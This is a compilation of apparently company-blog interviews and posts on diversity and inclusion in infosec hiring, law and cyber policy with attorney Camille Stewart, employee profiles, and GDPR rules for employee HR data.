Cindy Ng: Can you give us some context to this stat? In the infosec space, 58% of females who hold leadership positions have advanced degrees versus the 47% of males.
Allison Avery: This is something that we see in a lot of different industries. And I wish I had a better name for it, but what tends to happen is that there's a luxury to convention. I would think of it this way, when a person looks the part, you assume a lot of things about them. You assume their competence, you assume their quality, you assume their...you're not surprised. And so there's a luxury to their average- ness, and there's a luxury to them being good enough, correct?
I think that there generally when you do not look the part necessarily, you have to fill in things a little bit more, because they don't just assume that you're qualified, in the same way. And so it's not as luxurious to just be good enough. You have to be above average in order to be considered equal, you know, there's an adage in especially in the black community, there is this adage that you need to be twice as good to be considered just as qualified. You're starting from a different assumption, and a different framework and then going from there.
A lot of times women, they don't assume a level of competence, you're proving it and then you go from there to the other man, or whatever because he looks the part, because he's assumed to be the part. You're assuming a level of competence and jumping out from that point. The level of work that they need to do, the level of accomplishments that they need do, and the level of performance doesn't have to be quite the same because you're already assuming competence. And the other person, i.e. and I think this actually harkens back to the initial question to of, do you choose diversity or skills? And that goes back to so many questions when people say things about, you know, they look around the room, let's say you know we've seen this on TV.
We hear this about, you know, certain social campaigns, about like, "Oh, did you get into Harvard because you were black, or because you deserved it?" Those two things...they're assumed to be diametrically opposed as opposed to thinking that the person...as opposed to assuming competence, and assuming quality and qualification.
Cindy Ng: How can we build a good D&I program? Or maybe a better question is what do we need to have on our radar so we can have the best possible outcome?
Allison Avery: The biggest kind of hairy fault lines that I think happen to organizations, is that they try to go too fast too soon, when it comes to D&I, or they try to go from 0 to 1,000. I think that that's very dangerous, it can be very detrimental to D&I efforts. And so I think you want to be really, really clear on why you're doing it, because it's not just doing diversity for diversity's sake. That's a really important piece, because if you can't explain the rationale for why you're doing diversity, it ends up in that dichotomous form of, well, we're doing it because we have to do it because it's a good thing. And so I am choosing diversity over skill set, and it stays in that kind of lazy mentality, where you only do a first pass.
And that actually I think is much more harmful than having nothing. People don't understand why you're doing it. That's even worse than doing it, in my opinion. And so really having a firm understanding of the actual benefits and the actual rationale is very, very helpful, and starting very, very small and clear. And then having it on multiple different registers, like I was saying. So it's not just enough to have recruitment. So this is where people get tripped up is they think, "Okay, well, we need, you know, we need more minorities, so what are we going to do? We're going to go recruit."
Well, if you bring people in, that's only one iota of what is happening. Because that's just about diversity, that's not inclusion. Inclusion is about okay, so if you are recruiting a diverse workforce so then you have to look at engagement, you have to look at climate, you have to look at talent management, you have to look at success in planning, you have to look at the composition along the echelon of your institution, you have to look at compensation, you have to look at, you know, who's in upper management, who's in middle management, who's in below management? You have to look at, you know, all of these different arenas.
And so I think a very comprehensive strategic plan along...that's multi-yeared, with different goals and objectives of held accountable by a nested board, that is a not just staffed, nor is it just comprised of under-represented minorities, period. That is the most dangerous thing, too. It cannot just be minorities invested for themselves and of themselves. So if you're going to have any type of board, if you're going to have any kind of competition, it has to be led by an executive and CEO. It has to be invested by upper management and upper leadership. It has to be really, really supported because otherwise it won't be successful, and pairing people along different ethnic domains, you know, having different relationships forms, like mentoring programs and talent management programs, and people from outside of their...even outside of their area of expertise, social identity categories, even gender identity categories.
You know, so that there is more relationship building, going back to this point of white Americans having 91 times as many white friends black friends, to try to break down those types of prohibitive barriers that can be compensated for, if an intentional structural design is put in place within the institution, or within the organization.
Cindy Ng: Okay, we need get everyone's buy-in, we need to build partnerships, there needs to be a multi-year long term vision. It sounds so complicated.
Allison Avery: It's very complicated. It's not just for one segment of the population, that's a transformative in a sort of transcendent piece, you know, like that's the whole idea, is that if you understand it appropriately and you really know the actual benefits to social diversity within your industry, of why does it make sense to have more social diversity within your organization, i.e., better financial gains, better product development, niche markets that can be developed, more engagement of a workforce, you know, greater capacity, enhanced creativity, better innovation.
I mean, if you really truly know that and then you see that, it betters everyone's game and everyone's performance in the organization. Albeit it makes things a little more challenging, because you know the more diverse...the more challenging things are, people have to work a little bit harder. But it should pay dividends, that's the piece. It should make your company more lucrative, and then people should benefit from that who work there. So it should make your lives better, our lives better. So there really should be marketable, as well as tangible payoffs that aren't this sort of esoteric made up social justice circumscribed idea of like its good diversity for diversity sake. It's not as I think ambivalent or opaque as people sort of feel it is.
We continue our conversation with cyber and tech attorney Camille Stewart on discerning one's appetite for risk. In other words, how much information are you willing to share online in exchange for something free?
It's a loaded question and Camille takes us through the lines of questioning one would take when taking a fun quiz or survey online. As always, there are no easy answers or shortcuts to achieving the state of privacy savvy nirvana.
What's also risky is that we shouldn't connect laws made in the physical world to cyberspace. Camille warns: if we start making comparisons because at face value, the connection appears to be similar, but in reality isn't, we may set up ourselves up to truly stifle innovation.
And if anybody remembers Henrietta Lacks, her data was used to create all of these things that are very wonderful but she never got any compensation for it. Not knowing how your information is used takes away all of your control, right? And a world where your data is commoditized and it has a value, you should be in control of the value of your data. And whether it's as simple as we're giving away our right to choose how and when we disburse our information and/or privacy that leads us to security implications, those things are important.
For example, you don't care that there's information pooled and aggregated from a number of different places about you because you've posted it freely or because you traded it for a service that's very convenient until the moment when you realize that because you took the quiz and let this information out or because you didn't care that your address was posted on like a Spokeo site or something else, you didn't realize that all of the questions to your banking security information are now all easily searched on the internet and probably being aggregated by some random organization. So somebody could easily take and say, "Oh, what's your mother's maiden name? Okay. And what city do you live in? Okay. And what high school did you go to? Okay."
And those are three pieces of information that maybe you didn't post in the same place but you posted and didn't care because you traded it for something or you posted it and you didn't think it through and now they can aggregate it because you use those two things for everything and now someone has access to your bank account, they've got access to your email, they've got access to all of these things that are really important to you and your privacy has now translated into your security.
So we all, just like organizations, just have to press it, have to make this vision become their appetite for risk. We as individuals have to do the same. And so if you are willing to risk because you think either, "They won't look for me," or, "I'm willing to take the hits because my bank will reimburse me," or whatever the decision which you are making, I want you to be informed.
I'm not telling you what your risk calculus is but I wanna encourage people to understand how information can be used, understand what they're putting out there and make decisions accordingly. So your answer to that might be like "Look, I don't wanna give up taking Facebook for this or sharing information in a community that I trust on some social site but what I will do is have a set of answers that I don't share with anyone to those normal questions that they use for password reset that are wrong but only I know the fake answers that I'm using for them."
So instead of your actual mother's maiden name, you're using something else and you've decided that that's one of the ways that you will protect yourself because you really wanna still use these other tools and that might be the way you protect yourself. So I challenge people not to give up the things that they love, like I mean, I would assess whether or not certain things are worth the risk, right?
Like a quiz on Facebook that makes you provide data to an external third party that you're not really sure of how they're using it, not likely worth it. But the quizzes where you can just kinda take them, that might be worth it. I mean, the answers you provide for those questions still are revealing about you but maybe not in a way that's super impactful. Maybe in a way that's likely just for marketing and if you're okay with that, then take that or you go resilient the other way.
Versus if there is human input, we would decide that that is something that they can then own the production of, right, because they contributed to the making of whatever the end product is. It's hard to speculate but there will have to be a line drawn and it's likely somewhere in there, right? The sense that there is enough human interjection, whether that is from the input from whatever creative process is happening by the machine or in the creation of the process or program or software that is being used and then spit out some creation on the end, there will have to be a law or I guess at least case law that kinda dictates where that line is drawn.
But those will be the things that's fun, right? Tiffany, and other lawyers like myself, I think those are the things that we enjoy most about the space is that stuff is unclear. And as these things roll out you get to make connections with the monkey case and AI and with other things that have already happened and new processes, new tech, new innovations and try to help draw those lines.
And so it's dangerous to make those comparisons without some level of assessment. And so I would tell people to challenge those assessments when you hear them and try to poke holes in them, because bad facts make for bad law. And if we take the easy route and just start making comparisons because on their face they seem similar, we may set up ourselves up to truly stifle innovation, which is exactly what we're trying to prevent.
That is not the same as cyber-based. And to liken the two in the way that you use rules is not smart, right? It's your first inclination to wanna try to stop data flow at the edge of a country, at the edge of some imaginary border, but it is not realistic because the internet by its very nature is global and interconnected and, you know, traverses the world freely and you can't really stop things on that line, which is why things like GDPR are important for organizations across the world because as a company that has a global reach because you're on the internet, you will be affected by how laws are created in different localities.
So that's a very big example but it happens in very discreet ways too when it comes to technology, cyberspace, and physical laws. Or the physical space and laws that are operated in that way and so I would challenge people that when you hear people make a one for one connection very easily without some level of assessment to try to question that to make sure it really is the best way to adapt some things to the given situation.
The reason for example, Tiffany's likening of AI to this monkey case, it's an easy connection to make because in your head you think, "Well, the monkey is not human, they made a thing, and if they can't own the thing then when you do that online and a machine makes a thing, they can't own a thing." But it very well may not be the same analysis that needs to be made in setting, right? The lines may become very different because none of us could create a monkey. So if I can't create a monkey, then it's harder to control the output of that monkey. But I could very well create a machine that could then create an output and shouldn't I be the owner of that output if I created the machine that then created the output?
Data breaches keep on happening, information security professionals are in demand more than ever. Did you know that there is currently a shortage of one million infosec pros worldwide? But the solution to this “man-power” shortage may be right in front of and around us. Many believe we can find more qualified workers by investing in Diversity & Inclusion programs.
According to Angela Knox, Engineering Director at Cloudmark, "We're missing out on 50% of the population if we don't let them [women] know about the job."
For skeptics: creating a more diverse workplace isn't about window dressing. It makes your company more profitable, notes Ed Lazowska, a Professor of Computer Science and Engineering at the University of Washington-Seattle. "Engineering (particularly of software) is a hugely creative endeavor. Greater diversity — more points of view — yields a better result."
According to research from Center of Talent Innovation, companies with a diverse management and workforce are 45 percent more likely to report growing market share, and 70 percent likelier to report that their companies captured a new market.
I wanted to learn more about the benefits of a D&I program, and especially how to create a successful one. So I called Allison F. Avery, Senior Organizational Development & Diversity Excellence Specialist at NYU Langone Medical Center, to get the details from a pro.
She is responsible for providing organizational development consultation regarding issues such as diversity and inclusion, performance improvement, workforce engagement, leadership development, and conflict resolution.
In part one of our interview, Ms. Avery sets the foundation for us by describing what a successful diversity & inclusion program looks like, explaining unconscious bias and her thoughts on hiring based on one's social network.
Can you define for us what diversity and inclusion means?
Allison Avery: The way that I like to define, or the way that I'm going to talk about diversity, is really referring to the richness of human differences. And so, that can mean anything from socio-economic status, race, ethnicity, language, nationality, sexual orientation, religion, all the way to learning styles and life experiences. I know, for the context of this conversation. We're really going to target specifically on a lot with regard to race, and ethnicity and gender because that's really who's primarily underrepresented in the tech field. We're going to talk a lot about that, but diversity in and of itself primarily just means, really, difference, and it's sort of a naturally-occurring phenomenon.
And then, inclusion is the way in which we engage that diversity. So, it refers to active, intentional and ongoing engagement with that diversity. It's the way that we foster belonging, that we value and encourage engagement and that we really connect individuals throughout. Whether it's an organization or institution, to leverage their excellence, leverage their skills, leverage their skill sets and promote them to grow into the climate and the culture that we're trying to cultivate within an organization, within an institution and even within an industry. So, it's the way that we intentionally, and ongoingly and actively engage the diversity at hand.
Cindy Ng: Describe for us the kinds of diversity and inclusion programs you've implemented and what has been successful.
Allison Avery: There are a couple of different arenas that I think diversity and inclusion programming gets parsed into. One is primarily along the lines of recruitment and retention. Now, in medical school, we tend to not have any general issue with retention, but that tends to be in the domain of professional development. And that's pervasive throughout any industry, and I see that within a lot of the articles I was reading in the tech industry. There are some initiatives going on through Google and Twitter of trying to recruit individuals from different industries to companies, and that's just a pervasive element. So, we do a lot of recruiting here at the medical school for students from the educational pipeline. So, we go to undergraduate institutions, we have summer programs for students that are rising juniors and seniors to come and spend the summer to do basic science research, primarily targeted for Blacks and Latinos because those targeted minority groups are underrepresented in medicine. Only about 6% of medical school matriculants are Black-identified and about 4% are Hispanic-identified in the country. About 56% are white-identified matriculants in medical school in 2014.
So, there's a huge underrepresentation and, as we see the shifting demographics of the country over time, minorities will become the majority by 2050. That's kind of the projected...and even before, that's kind of of the projected year. So, we see a kind of need for greater representation in a medical school, so we do a lot of recruitment effort. NYU just matriculated its highest composition of diversity this past year or so. The entering class of 2014 was the most diverse ever, and so our efforts were quite rewarded in having a cultivated class of compositional diversity. That was a very successful effort and that is from going schools to having a very diverse group of individuals on the screening committee, on the interview committee. We have multiple mini interviews, so we have, where individuals do not review the full record. When students come into interviews, we try to eliminate aspects of bias. So, there's trainings on unconscious bias for all the interviewers, trainings on unconscious bias for all the screeners. That's another effort that we do. So, recruitment is a really big, targeted effort with regard to any industry for trying to attract and recruit underrepresented minorities.
Another area is educational enrichment. And so, there's a lot of efforts to look at how do we ameliorate and reduce health and health care disparities. That's basically looking at cultural competency training for all physicians, because healthcare is something, and rendering appropriate healthcare and rendering it across different cultural lines, is something that every physician needs to have the capacity for, especially when we're looking at the diversity in the pluralistic community of the patient population that all physicians are needing to have the capacity to serve. And so, I think that that's also generalizable to the tech industry when you look at the shifting demographics of the country of users. So, there is a huge pluralistic nation that we have, and people have different needs and there are very different markets that can be targeted and marketed toward. Having different educational initiatives, looking at how do we reduce health and health care disparities, and training students has been a very big initiative within the curriculum.
So, how do we basically educate our entire population of students to be able to render care for a huge and diverse patient population? They need to know about things like health disparities, they need to know about things like social determinants of health. They need to know about how bias might impact their decision-making on treating different types of patients of certain races, of certain genders, of certain sexual orientations. And they need to know how, generally, socially disadvantaged groups tend to receive worse quality healthcare.
Cindy Ng: Earlier you mentioned unconscious bias. Can you define that term for us?
Allison Avery: Unconscious is pretty much anything that's outside of our conscious awareness, which is primarily the main way that we operate, it’s likened that about 90% of our mental processes and the way that we operate is outside of consciousness. So, the unconscious is pretty much any mental process that is inaccessible to consciousness, but it influences our judgments, our feelings and our behavior. It's pretty pervasive.
And then, bias is really neutral term. It gets a kind of negative rap and it's something that we cannot do without, nor would we want to. But bias is pretty much, it's just a tendency or an inclination, but it's one that prevents an unprejudiced consideration of a question. So, it has this sort of stigma to it but bias is really, it's just a neutral thing. But the way that we understand unconscious bias and the way that we're talking about it, is in this arena of prejudice, social stereotypes and attitudes that we form about certain groups of people without our intention or our conscious awareness. And that's what we really mean when we're talking specifically about unconscious bias as it relates to certain groups of people and how that influences the way that we engage with people.
That's how I'm sort of using the term as it relates to D&I work in our workspace and how it might prevent the hiring of a person, how it might impede diversity and inclusion efforts, and that's been noted as one of a main and contributing barrier to compositional diversity effort. Hiring practices in the recruitment phase, in the interview phase, in trying to really, really have a very, very diverse workplace, unconscious bias has been kinda targeted and denoted as one of a huge area or an impediment to having the diversity that we would like to consciously see. And I think it's really important to make the distinction. It's the distinction between the way that we consciously believe, and we might have these very consciously-held egalitarian views, which I believe that we do if you look at social attitudes in this country over the past 40 years and the evolution of which they've grown, and they've changed and they've evolved very, very drastically. It's more stigmatized now to be a racist in this country than probably almost anything else. It's very, very stigmatized. However, when you look at some of our unconscious attitude and what some of the outcomes, a lot of our actual practices, i.e. some of the health outcomes, some of our housing outcomes, some of the actual behaviors and outcomes have remained unchanged.
So, like you were saying, in the tech industry, there have been a lot of things that have remained unchanged for the past 15 years or, you know, two years or 10 years. It's that spectrum or that dichotomy between the way that we consciously believe and, sometimes, the way that our unconscious behaviors and the manifestation of which gets played out. And bridging those two is the space of bias, and trying to bring those two things a little bit more in alignment and a little bit more closer together. So, we have there pretty egalitarian conscious attitudes, but the outcome of which doesn't really reflect that when you look at some of our composition in the workspace, some of our health outcomes and the way that we hope to think of ourselves. You know, look at the composition of our prison system, look at the composition of women in the tech field.
Cindy Ng: It's popular in the tech field to hire based on one's social network. What's your opinion on that?
Allison Avery: I think on face value and on first flush, that seems like a good idea but I don't think we've tracked the full ramifications of what that means. And I think that there's a way that, on first pass, that seems like a very respectable way to go about doing business, and I think on one level it is. But we need to do a little bit of a deeper dive on what do we mean by things like, how do we define culture fit? How do we define somebody who is aligned with our organization and the diversity that we want? And what are the actual ramifications of just pulling from our social networks? So, when we look at how people's social networks get created and cultivated, they tend to be, like you said, people tend to migrate toward people that are like them. And that tends to also fall within similar social identity categories, socio-economic lines and class status, correct?
So, on one level, it seems like a very good...on first pass, if you don't dig any deeper, it seems like a very good idea. Okay. Somebody suggests a friend and that person comes into the organization, and they probably do fit in very well, and they probably get along very well and then you kind of go forward without thinking much further. But then, when you look at the compositional diversity of who, then, you attract, everybody sort of seems to either come from similar schools so you're not getting a diversity of educational experiences, come from similar classes and, potentially, demographics. So, you might have similar social identity categories of composition. When you look at the composition...I was just reading this article called, "What it's actually like to be a black employee in a tech company," and they cited some really, really interesting statistics and I think it's very worthwhile to go over those because the Public Religion Research Institute has some statistics related to people's social networks. And you know, white Americans have 91 times as many white friends as black friends. I think that's really important because three-quarters of whites have entirely white social networks without any minority presence. So, if that's where you're pulling from, what are the odds that you're going to have a huge minority presence if that's the pool that you're pulling from? Clearly, just from a statistical representation, very, very small, correct?
But unless you know that and unless you're thinking in those terms, it just seems like a very good idea from first pass. That's why a deeper dive is so much more necessary, and that's why I think that there isn't this intentionally evilness to people who are anti-diversity. It's just that they don't tend to know, nor do they tend to dig, and there's this naiveté of, "Well, invite individuals from their social networks and things should just be fine." But people think that other social networks are much more diverse than they actually are, and that's just not true. And so, once you know that, once you know that, "Okay, if this is our structure, employees are actively encouraged to suggest friends or former colleagues," well, if you also know that your company is comprised of 57% of this, and then you know that those individuals are going to be 91 more times likely to, "Blah, blah, blah," well, then you're going to rethink your methodology. But generally, people don't have that type of statistical awareness or insight into how these social networks are formed or structured, and so they don't understand all the nuance related to recruitment and why it's so difficult to have elements of compositional diversity.
Cindy Ng: How would you reshape hiring practices?
Allison Avery: So, a couple of different things. One, I would have pervasive unconscious bias training for all hiring managers completely required. I mean, that's just a given and an automatic.
Number two, there are some things right at the outset that take people out of the running right away, like affiliate universities. There's pooling from similar universities that have a lower representation of underrepresented minorities.
So, you make partnerships with schools that are serving very high, either women or very high minority-serving institutions, and those tend to actually not be the Berkeleys and the Stanfords of the world. So, you can look at the compositional diversity of different institutions. So, I know at NYU we tend to partner with certain very specific institutions that have either very strong STEM programs, so they're doing a lot of work with very high-quality students and doing a lot of rigorous scientific work, and we make very strong partnerships with them so that we also know the quality and the caliber of the student. And so, you can be a hiring manager and you make partnerships with, whether it's a nonprofit or whether it's an undergraduate institution that's a high serving minority, but that you also are vetting with regard to the quality or you're investing in the quality. So, you can help mentor them in the creation or co-creation of their program and have some sort of influence. That's another way. So, you develop these kind of pipeline programs, that's another one, and then you reward those elements.
Having internship, that's another element. Not just pooling people from your social network. Also, the more diverse your hiring system is...so, we know that whatever kind of interview process you have, if you put five people in a room and that's the interview team, they are going to replicate themselves in who they hire. So, whomever you want hired is how you comprise your hiring team. So, if you would like a very diverse team hired, then you need to have a very diverse hiring team. The worst thing that you want to do is just have one hiring manager because you're most likely going to have that person replicated in whomever they hire. So, you want as many people to weigh in as possible and you want that team that gets weighed in as diverse as possible. So, that's another recommendation that we do.
So, those would be just the first pass of things that I would recommend, very quickly. And taking out words in the job description of what you're looking for. So, we know that there's a lot of gender priming in the job description, like things like, "Strong leader," and "Aggressive manager," and those are very, very gender-oriented. Or when people assume at the very outset, sometimes, a lot of things about people, relocation, if they're interested relocating or not, or inappropriate questions that they wouldn't ask, you know, a man versus a woman, and things like that and really being conscientious that is not present within any part of the on-boarding. So, that's also looking at the job descriptions and really making sure that those aren't either gender or sort of racially-leaning.
And making sure that these things are advertised and reaching individuals in different pockets, so utilizing and leveraging people in-house too, utilizing any type of people in-house. So, you know, in kind of reading some of these articles, there's a lot of informal or even formal professional networks within an organization or institution. So, we have the Black and Latino Student Association and they belong to a professional association called the Student National Medical Association. Well, that's primarily for black medical students. Then there's the NHMA, which is National Hispanic Medical Association and that serves Hispanic medical affiliates. And so, there's a lot of affiliate, there's formal and there's informal. I know there was one in one of the articles that I was reading of Twitter, called each other the Blackbird, Twitter's internal group for black employees leveraging the internal group that is serving or is in the interest group of certain underrepresented or underserved minorities that is your target. And being really intentional about saying that this is a priority, and this is why and this is why we're valuing a certain demographic that's extraordinarily underrepresented in this organization.
Also, when we look at paid differentials, so something that is very pervasive. So, when you look at how people are staffed, when you look at upper-level management and the composition, and how the color changes as you go along the rungs. And we know that the American Institute for Economic Research has done a lot of noting that, you know, employees of color as statistically paid less by a considerable margin. And that's substantiated by a lot of economic research looking at how pay is a differential and trying to reconcile that, looking at how people are promoted and looking where they're staffed. Are the majority of black employees on the janitorial and security contractor level, or are they, you know, in middle management? And how are people being staffed throughout the organization, and where, and what does that look like? And you can be more intentional about that, and it's important.
While reading about our latest technological advances, such as digital license plates and self-driving cars, I wondered about our industry’s core security principles that set the foundation for all our innovation.
However, what about user agreements? We’re able to create incredible new advances, however we can’t get our user agreements right. Even though the agreements are for the users, it’s rare that they want to read the legalese. It’s just easier to click ‘accept’. As the author suggests, there must be a better way for end users to interact with tech companies.
Many want the law to keep pace with technology, but what's taking so long?
A simple search online and you'll find a multitude of reasons why the law is slow to catch up with technology - lawyers are risk averse, the legal world is intentionally slow and also late adopters of technology. Can this all be true? Or simply heresy?
I wanted to hear from an expert who has experience in the private and public sector. That's why I sought out the expertise of Camille Stewart, a cyber and technology attorney.
In part one of our interview, we talk about the tension between law and tech. And as it turns out, laws are built in the same way a lot of technologies are built: in the form of a framework. That way, it leaves room and flexibility so that technology can continue to evolve.
Tech people, they want law to catch up with technology. Lawyers wished tech people would understand the law a little bit more. And some have even criticized that the law doesn't move as quickly as technology, and you have a lot of experience both as a cybersecurity attorney in Washington and in the private sector.
And I'm wondering if there's a deeper divide between the two entities, and I'm wondering if you can share your experience with us in working with lawmakers as well as your experience in the private sector.
You want the law to leave room and flexibility so that technology can continue to evolve. And so that's kind of what has to happen. It's frustrating that there are no legal recourses when an issue comes up, but you almost have to test those boundaries to figure out a framework to fit your bill to address issues that are coming.
So even the laws that we do build tend to be framework because we need to leave room for that innovation and ideation. And part of the tension between technology communities and lawyers and technology communities and the general public or the government is trust. So technologists don't trust the government with the information that they have, and the government wants to build that trust desperately so that we can leverage the resources that are at the disposal of both.
You know, the government has a lot of insight and intelligence that they can layer over the tools and capabilities in the private sector, and if they came together, it's great, but there's this base level of trust and understanding of what each is trying to do that if we could bridge that gap, so much more could be done.
Organizations like DHS that work with the private sector quite a bit are trying to build those bridges and find ways to share information in a way that's valuable to both the private sector and the government through things like AIS, the Automated Indicator Sharing system. And it's gonna be a slow process.
Those trusts are bolted tight.
Private sector has coalesced together to build trust circles with their peers and people that they know doing work that they understand, and they're sharing information that way. And those mechanisms have become pretty robust and helpful, but the government has to be able to be a part of that for us to really complete the picture, and that's the work that's being done, some through non-profit organizations, NGOs, but also through the government and the private sector starting to get into a room.
And then, as people move back and forth across lines, right, traditionally people were govies for life, or they were in the private sector. Now there's more movement back and forth, and that'll help build the trust as well.
And then technologists, on the other hand, need to be willing to have those conversations and those explanations and understand that lawyering of the past, there was the perception that lawyers were just gonna say no. Right? They're risk averse, they aren't gonna let you ideate and innovate, they're just gonna shut it down. And that's not really true.
My job as a lawyer and the jobs of lawyers at companies today, especially if they deal with technology and cyber issues, is to lay out the risk, understand the organization’s risk calculus, and to put the information in front of leadership so that they can make an informed decision and then help to build a cast-forward that calculates those risks, that mitigates those risks to the best of their ability and be ready to support the company in what they've done.
So, with that base level understanding and the willingness to do the work to understand, lawyers can be great assets to technologists because they can be translators, different communities, as well as the company builds out and understands what the risk posture is. It's important to have all key stakeholders as part of that discussion, and lawyers are definitely part of that group.
And had you accounted for more perspective on the front end in a proactive way, it would have mitigated some of the risk on the back end or you would have been able to right yourself more quickly.
And so I think watching that occur has started a number of organizations and built a number of frameworks to help organizations get the right people in the room and encourage people to do the work to figure out where different players fall in the conversations that they're having as an organization about how the security is evolving and how technology will be used and integrated in the organization. But I think that outside factors in this area of law and cyberspace evolving has done a lot of the work to encourage the collaboration that's needed.
In April of 2013, after a short stint as a professional baseball player, Sean Campbell started working at Varonis as a Corporate Systems Engineer.
Currently a Systems Engineer for New York and New Jersey, he is responsible for uncovering and understanding the business requirements of both prospective and existing customers across a wide range of verticals. This involves many introductory presentations, proof of concept installations, integration expansion discussions, and even the technical development of Varonis channel partners. Sean also leads a team of subject matter experts(SME) for our innovative DatAlert platform.
According to his manager Ben Lui:
Sean Campbell is one of the most talented engineers on my team. He is the regional DatAlert SME and bridged valuable feedback from both customers and the field back to product management. Sean is also an excellent team player and excels at identifying critical data exposure during customer engagements. Overall, Sean is a key contributor to the Varonis organization.”The fast paced environment, challenge of data security, and the fact that the sales cycle is far from “cookie cutter” is what Sean enjoys most about his role here. He also values the relationships he has been given the ability to build up over the years on both the Varonis and customer side.
Data protectionism - restricting the movement of data between countries - will be an option that governments will elect to implement in the upcoming months and years. As the world economy become more data-driven, impacting global GDPs, they will soon find their way into trade deals, requiring data to be held in servers inside certain countries.
It’s not just a business decision. Exporting data on individuals is also heavily restricted because of privacy concerns. And we saw a Belgian legislator voice this concern during a discussion with Facebook’s CEO on his value as a user.
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Thompson, Mike Buckbee
Outsourcing tedious tasks is a dream of many and at the latest Google Developer’s conference, the audience beamed when Google Assistant booked an appointment. However, attendees were quick to worry about potential exploits those devices might face.
Medical devices are a good example of what computerized assistants might face in the future. Yes, medical devices can save lives and certainly serve a more noble cause than outsourcing tedious tasks, but the security aspect of these life-saving pacemakers and defibrillators still require firmware updates.
Seems that we still haven’t learned our lesson: embed security at the initial stages of design.
Other articles discussed:
If you’ve ever seen Technical Evangelist Brian Vecci present, his passion for Varonis is palpable. He makes presenting look effortless and easy, but as we all know excellence requires a complete devotion to the craft. I recently spoke to him to gain insight into his work and to shed light on his process as a presenter.
“When I first started presenting for Varonis, I’d have the presentation open on one half of the screen and Evernote open on the other half and actually write out every word I was going to say for each slide,” said Brian.
From there, he improvises from the script.
“I’d often change things up while presenting based on people’s reactions or questions, but the process of actually writing everything out first made responding and reacting and changing the presentation a lot easier. I still do that, especially for new presentations.”
According to Varonis CMO David Gibson:
Brian's high energy, curiosity, and multi-faceted skills - technical aptitude, communication skills, sales acumen, and organizational capabilities -make him an exceptional evangelist.
Sara Jodka is an attorney for Columbus-based Dickinson Wright. Her practice covers boths data privacy as well as employee law. She's in a perfect position to help US companies in understanding how the EU General Data Protection Regulation (GDPR) handles HR data. In the second part of our interview, Sara will talk about the relationship between HR data and Data Protection Impact Assessments (DPIAs). Most companies will likely have to take the extra step and perform these DPIAs but there are specific triggers that Sara will delve into.
Sara Jodka: Thank you for having me.
IOS: I wanted to get into an article that you had posted on your law firm's blog. It points out an interesting subcategory of GDPR personal data which doesn't get a lot of attention, and that is employee HR records. You know, of course it's going to include ethnic, payroll, 401(k), and other information.
So can you tell us, at a high level, how the GDPR treats employee data held by companies?
Whenever we're looking at it, none of the articles say that all of these people have these rights. All these individuals have rights! None of them say, "Well, these don't apply in an employment situation." So we don't have any exclusions!
We're led to "Yes, they do apply." And so we've been waiting on, and we have been working with guidances that we're receiving, you know, from the ICO, with respect to …. consent obligation, notice obligation, portability requirements, and any employee context. Because it is going to be a different type of relationship than the consumer relationship!
IOS: It's kind of interesting that people, I think, or businesses, probably are not aware of this ... except those who are in the HR business.
So I think there's an interesting group of US companies that would find themselves under these GDPR rules that probably would not have initially thought they were in this category because they don't collect consumer data. I'm thinking of law firms, investment banking, engineering, professional companies.
They thought, "Well, because we don't actually have a physical location EU, it doesn't actually cover us." That's not actually at all true.
The GDPR covers people that are working in the EU, people who reside in the EU, so to the extent that U.S. company has employees that are working in the EU it is going to cover that type of employee data. And there's no exception in the GDPR around it. So it's going to include those employees.
IOS: So I hadn't even thought about that. So their records would be covered under the GDPR?
SJ: Yeah, the one thing about the definition of a data subject under the GDPR is it doesn't identify that it has to be an EU resident or it has to be an EU citizen. It's just someone in the EU.
When you're there, you have these certain rights that are guaranteed. And that will cover employees that are working for U.S. companies but they're working in the EU.
IOS: Right. And I'm thinking perhaps of a U.S. citizens who come there for some assignment, and maybe working out of the office, they would be covered under these rules.
SJ: And that's definitely a possibility, and that's one thing that we've been looking for. We've been looking for looking for guidance from the ICO to determine … the scope of what this is going to look not only in an employment situation, but we're dealing with an immigration situation, somebody on a work visa, and also in the context of schools as we are having, you know, different students coming over to the United States or going abroad. And what protection then the GDPR applies to those kind of in-transition relationships, those employees or students.
With a lot of my clients, we are trying to err on the side of caution and so do things ahead of time, rather than beg forgiveness if the authorities come knocking at our door.
In that article, you mentioned that the processing of HR records has additional protections under the GDPR … An employee has to give explicit or consent freely and not as part of an employer-employee contract.
[caption id="attachment_10803" align="alignnone" width="800"] GDPR's Article 6 says there are only six lawful ways to process data. If you don't obtain freely given consent, then it gets tricky.[/caption]
Can you explain this? And then, what does an employer have to do to process employee data especially HR data?
SJ: Well, when we're looking at the reasons that we're allowed to process data, we can do it by consent, and we can also do it if we have a lawful basis.
A number of the lawful bases are going to apply in the employer context. One of those is if there is going to be an agreement. You know, in order to comply with the terms of a contract, like a collective bargaining agreement or like an employment agreement. So hire/fire payroll data would be covered under that, also if there is … a vital interest of an employee.
There's speculation that that exception might actually be, or that legitimate basis might be used to obtain vital information regarding, like, emergency contact information of employees.
And there's also one of the other lawful basis is if the employer has a greater, you know, interest in the data that doesn't outweigh the right of the data subject, the employee.
The issue though is most ... when we talk about is consumer data, and we're looking a lot at consent and what actually consent looks like in terms of the express consent, you know, having them, you know, check the box or whatever.
In an employee situation, the [UK’s] ICO has come out with guidance with respect to this. And they have expressly said in an employee-employer relationship, there is an inherent imbalance of bargaining power, meaning an employee can never really consent to giving up their information because they have no bargaining power. They either turn it over, or they're not employed. The employer is left to rely only on the other lawful basis to process data, excluding consent, so the contractor allowance and some of the others.
But the issue I have with that is, I don't think that that's going to cover all the data that we actually collect on an employee, especially employees who are operating outside the scope of a collective bargaining agreement.
In a context of, say, an at-will employee where there is that ... where that contract exception doesn't actually apply. I think there will be a lot of collection of data that doesn't actually fall under that. It may fall into the legitimate interest, if the employer has the forethought to actually do what's required, which is to actually document the process of weighing the employer's interest against the interest of the employee, and making sure that that is a documented process. [ Read the UK's ICO guidelines on the process of working out legitimate interest.]
[caption id="attachment_10804" align="alignnone" width="800"] When employers claim a legitimate interest exception to getting employee consent, they have more work to do. [Source: UK ICO][/caption]But also what comes with that is the notice requirement, and the notice requirement is something that can be waived. So employers, if they are doing that, are going to have to — and this is basically going to cover every single employer — they're going to have to give their employees notice of the data that they are collecting on them, at a minimum.
IOS: At a minimum. I think to summarize what you're saying is it's just so tricky or difficult to get what they call freely given consent, that most employers will rely on legitimate interest.
